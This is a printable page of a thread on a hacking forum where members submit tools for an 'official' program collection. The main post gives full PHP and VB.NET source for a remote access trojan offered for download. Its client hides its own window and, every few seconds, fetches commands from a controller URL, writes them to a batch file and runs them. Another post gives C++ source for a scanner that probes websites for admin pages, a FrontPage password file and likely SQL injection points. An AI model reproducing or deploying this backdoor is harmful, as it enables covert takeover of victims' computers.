Sinisterly
Your program in the official HC Programs? - Printable Version

+- Sinisterly (https://sinister.ly)
+-- Forum: Hacking (https://sinister.ly/Forum-Hacking)
+--- Forum: Hacking Tools (https://sinister.ly/Forum-Hacking-Tools)
+--- Thread: Your program in the official HC Programs? (/Thread-Your-program-in-the-official-HC-Programs)

Pages: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17

RE: Your program in the official HC Programs? - Deque - 04-17-2013

@static_cast: Nice program, thank you. Post your thread in the programming section. I will move it to HC Official.

RE: Your program in the official HC Programs? - static_cast - 05-20-2013

Name: Official HC RAT
Description: This is a RAT written in PHP and VB.
Download Links:
http://static_cast.home.comcast.net/RAT.zip
https://dl.dropboxusercontent.com/u/125590256/RAT.zip
Here is the code for both files[TIP: The PHP page can also be viewed on smartphones and such, when rotated 90 degrees. Biggrin]:

rat.php
Code:
<?php
if(isset($_POST['submit']))
{
$text = $_POST['text'];
file_put_contents("commands.txt", $text);
}
?>

<html>
<head>
  <title>Hackcommunity PHP RAT</title>
</head>
<body style="background-image: url('http://i.imgur.com/l9LtNzl.png'); color: white">
  <center>
   <div style="background-color: black"><img src="http://static_cast.home.comcast.net/old/newLogo.png" alt="PHP RAT" /></div>
   <form action="#" method="POST" style="height: 520px; width: 480px">
    <textarea name="text" style="background-color: #333; color: white; width: 100%; height: 500px"><?php echo file_get_contents("commands.txt"); ?></textarea>
    <br />
    <input type="submit" name="submit" value="Save" style="margin-right: -1px; float: right" />
   </form>
  </center>
</body>
</html>

host.exe (Just make a windows form and paste this if you have Visual Studio)
Code:
Imports System.Net
Imports System.IO.StreamReader
Imports System.IO.StreamWriter

Public Class Form1

    Dim oStrText As String
    Dim nStrText As String
    Dim commandPath As String = "commands.bat"
    Dim serverPath As String = "server.txt"
    Dim server As String

    Public Function LoadSiteContent(ByVal url As String) As String
        Try
            Dim instance As WebClient = New WebClient
            Return instance.DownloadString(url)
        Catch ex As Exception
            Return ""
        End Try
    End Function

    Private Sub Form1_Load(sender As System.Object, e As System.EventArgs) Handles MyBase.Load
        Me.Opacity = 0
        Me.ShowIcon = False
        Me.ShowInTaskbar = False
        Timer1.Enabled = True
        Timer1.Interval = 2500

        Try
            Dim objReader As New System.IO.StreamReader(serverPath)
            server = objReader.ReadToEnd()
            objReader.Close()
        Catch ex As Exception
            Dim objWriter As New System.IO.StreamWriter(serverPath, False)
            objWriter.Write("server to listen to")
            objWriter.Close()
        End Try

        Try
            Dim objReader As New System.IO.StreamReader(commandPath)
            oStrText = objReader.ReadToEnd()
            objReader.Close()
        Catch ex As Exception
            Dim objWriter As New System.IO.StreamWriter(commandPath, False)
            objWriter.Write(nStrText)
            objWriter.Close()
        End Try
    End Sub

    Private Sub Timer1_Tick(sender As System.Object, e As System.EventArgs) Handles Timer1.Tick
        nStrText = LoadSiteContent(server)

        If nStrText <> oStrText Then
            oStrText = nStrText

            Dim objWriter As New System.IO.StreamWriter(commandPath, False)
            objWriter.Write(nStrText)
            objWriter.Close()

            Shell(commandPath)
        End If
    End Sub

End Class
Supported OS: Windows [Others with WINE]
Coded in: PHP+VB
Screenshots:
[Image: clean.jpg]
http://s10.postimg.org/4chi3ztnt/clean.png

RE: Your program in the official HC Programs? - Deque - 05-20-2013

@"static_cast": Thanks for your entry. Post it in the coding section, I will move it to HC Official.
Also: Do you want to become a member of HC Dev? That would allow you to post your programs in HC Official without applying here.

RE: Your program in the official HC Programs? - static_cast - 05-20-2013

(05-20-2013, 08:33 PM)Deque Wrote: @"static_cast": Thanks for your entry. Post it in the coding section, I will move it to HC Official.
Also: Do you want to become a member of HC Dev? That would allow you to post your programs in HC Official without applying here.

Sure, I'll be HC Dev. I'm making a port scanner right now. Biggrin

My tool - Dreamwalker - 08-16-2013

[Image: wa2a.jpg]

Name: URL Scanner 1.2 Hackcommunity.com edition, Coded in C++:
Supported OS: Windows with wininet (<- most have it)

Description:
This tool will scan potentially vulnerable files and directories on a web server, it will scan things for information gathering files like robots.txt, sitemap.xml etc, it will scan for potential SQL injection links, login and admin pages, along with frontpage extension files/directories and much more. It works with real time feedback and is very easy to use.

Windows 32 bit compiled executable here

Source:

Code:
#include<windows.h>
#include<iostream>
#include<string>
#include<wininet.h>

using namespace std;
#pragma comment (lib, "wininet.lib")

//Simple function to return a bool value to check whether URL is valid
bool ValidURL(string url)
   {
   bool result = false;

   HINTERNET hSession = InternetOpen("ValidURL", INTERNET_OPEN_TYPE_PRECONFIG, 0, 0, 0);
   if (hSession != 0)
      {
      HINTERNET hFile = InternetOpenUrl(hSession, url.c_str(), 0, 0, INTERNET_FLAG_RELOAD, 0);
      if (hFile != 0)
         {
         int code = 0;
         DWORD codeLen = sizeof(int);
         HttpQueryInfo(hFile, HTTP_QUERY_STATUS_CODE | HTTP_QUERY_FLAG_NUMBER, &code, &codeLen, 0);

         result = code == HTTP_STATUS_OK || code == HTTP_STATUS_REDIRECT;

         InternetCloseHandle(hFile);
         }

      InternetCloseHandle(hSession);
      }

   return(result);
   }



int main()
{
//Just intro
SetConsoleTitle("Vulnerable URL HackCommunity.com edition 1.2 beta by Dreamwalker");
SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE), 7);
    cout<<"--------------------------------------------------------------------------"<<endl;
    cout<<"\tVulnerable URL checker HackCommunity.com edition coded by Dreamwalker"<<endl;
    cout<<"\tvisit us at ";
    SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE), 11);
    cout<<" http://Dreamwalk.yolasite.com  ";
    SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE), 7);
    cout<<"for more tools"<<endl;
    cout<<"\t  This tool will scan for potentially vulnerable ";
    cout<<"URL's/directories\n\ton a webserver with realtime ";
    cout<<"feedback, to say thanks or report bugs\n\t\t\temail me on dreamwalk1986@gmail.com\n"<<endl;
    cout<<"--------------------------------------------------------------------------"<<endl;

    /*
    create 3 string, the input_url(got from user)
    the original input (copy of the input from user, used later in the loop to reset string)
    and file (string array) used for files/directories on server
    */

    string original_input_url, input_url, file[20]= {"/robots.txt","/wp-login.php","/login/","/login.php","/admin.asp","/adm/",
    "/admin/","/admin.php","/admin/home.php","/admin/cp.asp","/_vti_pvt/","/_vti_pvt/service.pwd","/_vti_inf.html","/cgi-bin/",
    "/~root","/cache/","/sitemap.xml","/index.php?catid=","/index.php?id=",};
    
      cout<<"Enter full URL ( ignore last forward slash, for instance http://google.com ):\n>";
      cin>>input_url;
      original_input_url = input_url;
  

      //PERFORM INITIAL CHECK TO SEE IF URL IS VALID
      cout<<"Performing check to see if website is valid"<<endl;

  
     if(ValidURL(input_url) == false)
     {
      cout<<"Invalid URL, closing..."<<endl;
      Sleep(10000);
      return 0;
     }
     else cout<<"That worked, now scanning files/directories..."<<endl;
     cout<<"--------------------------------------------------------------------------"<<endl;
  

    //NOW SCAN FILES/DIRECTORIES
     for (int i = 0; i < 19; i++)
     {
    
      //reset url
      input_url = original_input_url;
      input_url.append(file[i]);

    

      if(ValidURL(input_url) == false)
      {
          SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE),12);
          cout<<input_url<<" FAILED"<<endl;    
        
      }
      else
      {
          SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE),10);
          cout<<input_url<<" SUCCESS!"<<endl;
      }
     }  

      SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE), 7);      
      cout<<"Finished, automatically close shortly..."<<endl;

      //sleep for a bit
      Sleep(120000);

return 0;
  
}

@Deque please check it out

RE: Your program in the official HC Programs? - bluedog.tar.gz - 08-16-2013

@dreamwalker , @deque is the person you need for approvement Smile

RE: Your program in the official HC Programs? - Dreamwalker - 08-16-2013

(08-16-2013, 08:19 PM)bluedog.tar.gz Wrote: @dreamwalker , @deque is the person you need for approvement Smile

Cool... will he see this? or do I need to inbox him?

RE: Your program in the official HC Programs? - bluedog.tar.gz - 08-16-2013

(08-16-2013, 08:25 PM)Dreamwalker Wrote:
(08-16-2013, 08:19 PM)bluedog.tar.gz Wrote: @dreamwalker , @deque is the person you need for approvement Smile

Cool... will he see this? or do I need to inbox him?

If you mention her with @ infront of the persons name, then the person will get a notification.

RE: Your program in the official HC Programs? - teptslept - 08-16-2013

(11-07-2012, 04:52 PM)Deque Wrote: Is this ok?

[Image: gq9mtz7a.png]

Need downlod url. P.S. Nice thread

RE: Your program in the official HC Programs? - bluedog.tar.gz - 08-17-2013

(08-16-2013, 11:44 PM)teptslept Wrote:
(11-07-2012, 04:52 PM)Deque Wrote: Is this ok?

[Image: gq9mtz7a.png]

Need downlod url. P.S. Nice thread

How about you look further then your nose.
If you can't bring up the effort to look for it, then why should we give it to you.